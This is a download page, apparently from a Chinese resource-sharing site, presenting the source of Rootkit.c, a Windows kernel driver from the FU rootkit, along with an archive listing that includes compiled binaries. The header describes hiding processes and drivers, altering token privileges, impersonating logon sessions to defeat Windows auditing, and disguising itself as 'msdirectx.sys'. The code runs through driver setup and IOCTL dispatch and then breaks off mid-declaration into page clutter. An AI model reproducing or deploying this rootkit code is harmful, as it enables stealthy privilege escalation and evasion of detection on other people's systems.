///////////////////////////////////////////////////////////////////////////////////////
// Filename Rootkit.c
//
// Author: fuzen_op
// Email: fuzen_op@yahoo.com or fuzen_op@rootkit.com
//
// Description: This driver does all the work of fu.exe. The driver is never unloaded
// until reboot. You can use whatever methods you like to load the driver
// such as SystemLoadAndCallImage suggested by Greg Hoglund. The driver
// is named msdirectx.sys. It is a play on Microsoft's DirectX and is named
// this to help hide it. (A future tool will hide it completely!) The
// driver can change the groups and privileges on any process. It can also
// hide a process. Another feature is it can impersonate another logon
// session so that Windows Auditing etc. does not know what user really
// performed the actions you choose to take with the process. It does all
// this by Direct Kernel Object Manipulation (TM). No worries about do I have
// permission to that process, token, etc. If you can load a driver once,
// you are golden! NOW IT HIDES DRIVERS TOO!
//
// Date: 5/27/2003
// Version: 2.0
//
// Date 7/04/2003 Fixed a problem with a modified token not being inheritable.
// 12/04/2003 Fixed problem with faking out the Windows Event Viewer.
// Cleaned up the code a lot!
// 12/05/2003 Now the driver walks the PsLoadedModuleList and removes references
// to the device being hidden. Even after the device is hidden, a user
// land process can open a handle to it if its symbolic link name still
// exists. Obviously, a stealth driver would not want to create a or it
// could delete the symbolic link once it has initialized through the use
// of an IOCTL.
#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
#include "Rootkit.h"
#include "ProcessName.h"
#include "ioctlcmd.h"
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
//#define DEGUBPRINT
//#ifdef DEBUGPRINT
#define DebugPrint DbgPrint
//#else
// #define DebugPrint
//#endif
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
UNICODE_STRING deviceLinkUnicodeString;
// Setup our name and symbolic link.
RtlInitUnicodeString (&deviceNameUnicodeString,
deviceNameBuffer );
RtlInitUnicodeString (&deviceLinkUnicodeString,
deviceLinkBuffer );
// Set up the device
//
ntStatus = IoCreateDevice ( DriverObject,
0, // For driver extension
&deviceNameUnicodeString,
FILE_DEVICE_ROOTKIT,
0,
TRUE,
&g_RootkitDevice );
if(! NT_SUCCESS(ntStatus))
{
DebugPrint(("Failed to create device!\n"));
return ntStatus;
}
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
if(! NT_SUCCESS(ntStatus))
{
IoDeleteDevice(DriverObject->DeviceObject);
DebugPrint("Failed to create symbolic link!\n");
return ntStatus;
}
// Create dispatch points for all routines that must be handled
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = RootkitDispatch;
// Its extremely unsafe to unload a system-call hooker.
// Use GREAT caution.
DriverObject->DriverUnload = RootkitUnload;
// Get the offset of the process name in the EPROCESS structure.
gul_ProcessNameOffset = GetLocationOfProcessName(PsGetCurrentProcess());
if (!gul_ProcessNameOffset)
{
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_UNSUCCESSFUL;
}
gul_PsLoadedModuleList = (PMODULE_ENTRY) FindPsLoadedModuleList(DriverObject);
if (!gul_PsLoadedModuleList)
{
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_UNSUCCESSFUL;
}
return STATUS_SUCCESS;
}
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj != NULL)
{
// Delete the symbolic link for our device
//
RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
//
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_SUCCESS;
}
return STATUS_SUCCESS;
}
NTSTATUS
RootkitDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS ntstatus;
//
// Go ahead and set the request up as successful
//
ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
//
// Get a pointer to the current location in the Irp. This is where
// the function codes and parameters are located.
//
irpStack = IoGetCurrentIrpStackLocation (Irp);
//
// Get the pointer to the input/output buffer and its length
//
inputBuffer = Irp->AssociatedIrp.SystemBuffer;
inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBuffer = Irp->AssociatedIrp.SystemBuffer;
outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
switch (irpStack->MajorFunction) {
case IRP_MJ_CREATE:
break;
case IRP_MJ_SHUTDOWN:
break;
case IRP_MJ_CLOSE:
break;
case IRP_MJ_DEVICE_CONTROL:
if(IOCTL_TRANSFER_TYPE(ioControlCode) == METHOD_NEITHER) {
outputBuffer = Irp->UserBuffer;
}
// Its a request from rootkit
ntstatus = RootkitDeviceControl( irpStack->FileObject, TRUE,
inputBuffer, inputBufferLength,
outputBuffer, outputBufferLength,
ioControlCode, &Irp->IoStatus, DeviceObject );
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return ntstatus;
}
NTSTATUS
RootkitDeviceControl(
IN PFILE_OBJECT FileObject,
IN BOOLEAN Wait,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer,
IN ULONG OutputBufferLength,
IN ULONG IoControlCode,
OUT PIO_STATUS_BLOCK IoStatus,
IN PDEVICE_OBJECT DeviceObject
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceLinkUnicodeString;
MODULE_ENTRY m_current;
PMODULE_ENTRY pm_current;
ANSI_STRING ansi_DriverName;
ANSI_STRING hide_DriverName;
UNICODE_STRING uni_hide_DriverName;
int i_count = 0, i_numLogs = 0, find_PID = 0;
int nluids = 0, i_PrivCount = 0, i_VariableLen = 0;
int i_LuidsUsed = 0, luid_attr_count = 0, i_SidCount = 0;
in
没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
收起资源包目录
.rar (76个子文件)
新建文件夹
__history
cx.cpp.~50~ 4KB
Project1.cpp.~5~ 856B
cx.dfm.~14~ 2KB
cx.cpp.~54~ 4KB
fu.h.~4~ 1KB
cx.cpp.~48~ 3KB
cx.h.~22~ 1KB
fu.cpp.~8~ 12KB
Project1.cpp.~9~ 857B
fu.cpp.~2~ 19KB
fu.h.~1~ 810B
fu.h.~7~ 1KB
fu.cpp.~1~ 19KB
fu.cpp.~6~ 12KB
cx.dfm.~15~ 2KB
cx.h.~15~ 1KB
fu.h.~6~ 1KB
fu.h.~5~ 1KB
fu.cpp.~7~ 12KB
Project1.cpp.~8~ 874B
Project1.cpp.~1~ 860B
fu.cpp.~9~ 12KB
Project1.cpp.~6~ 862B
cx.cpp.~49~ 4KB
cx.h.~20~ 1KB
cx.dfm.~18~ 48KB
fu.cpp.~3~ 19KB
cx.dfm.~11~ 2KB
cx.h.~19~ 1KB
Project1.cpp.~3~ 857B
Project1.cpp.~2~ 857B
cx.h.~18~ 1KB
cx.h.~21~ 1KB
cx.h.~17~ 1KB
cx.dfm.~12~ 2KB
cx.h.~16~ 1KB
Instdrv.h.~1~ 176B
cx.cpp.~55~ 4KB
cx.dfm.~17~ 48KB
fu.h.~2~ 810B
cx.h.~14~ 1KB
Project1.cpp.~7~ 875B
cx.dfm.~16~ 48KB
fu.cpp.~5~ 13KB
cx.cpp.~53~ 4KB
Project1.cpp.~4~ 856B
cx.dfm.~9~ 1KB
cx.dfm.~13~ 2KB
cx.cpp.~51~ 4KB
cx.cpp.~52~ 4KB
cx.cpp.~46~ 3KB
Instdrv.cpp.~1~ 9KB
fu.h.~3~ 887B
fu.cpp.~4~ 19KB
cx.cpp.~47~ 3KB
cx.h.~23~ 1KB
cx.dfm.~10~ 2KB
Rootkit.c 28KB
Project1.cbproj.local 1KB
fu.cpp 12KB
cx.h 1KB
Instdrv.h 573B
fu.h 1KB
ProcessName.c 2KB
cx.dfm 48KB
Project1.cpp 857B
cx.cpp 4KB
Project1.res 22KB
Rootkit.h 2KB
Release
Project1.exe 631KB
msdirectx.sys 5KB
Project1.cbproj 12KB
ioctlcmd.h 1KB
ProcessName.h 579B
msdirectx.sys 5KB
Instdrv.cpp 8KB
共 76 条
- 1
eseefeng
- 粉丝: 2
- 资源: 5
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 卡方数据.sav
- Python实现基于Django框架的二手物品购物网站设计源码+数据库.zip
- 基于Python和Django的二手物品购物网站设计源码+数据库脚本.zip
- 【计算机毕业设计】基于h5的移动网赚项目小程序【源码+lw+部署文档+讲解】
- 【计算机毕业设计】基于ssm-vue的oa系统设计与实现【源码+lw+部署文档+讲解】
- 基于pytorch实现的YOLOV5+SORT的车辆行人目标识别及追踪系统源码.zip
- 【计算机毕业设计】基于servlet+jdbc的在线选房系统设计与实现【源码+lw+部署文档+讲解】
- 投身科技创新,勇担时代先锋.pptx
- 【计算机毕业设计】基于SSM的仿微博系统的设计与实现【源码+lw+部署文档+讲解】
- 使用 Web Components 实现,遵循 Material You 设计规范的 Web 前端组件库
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
- 1
- 2
前往页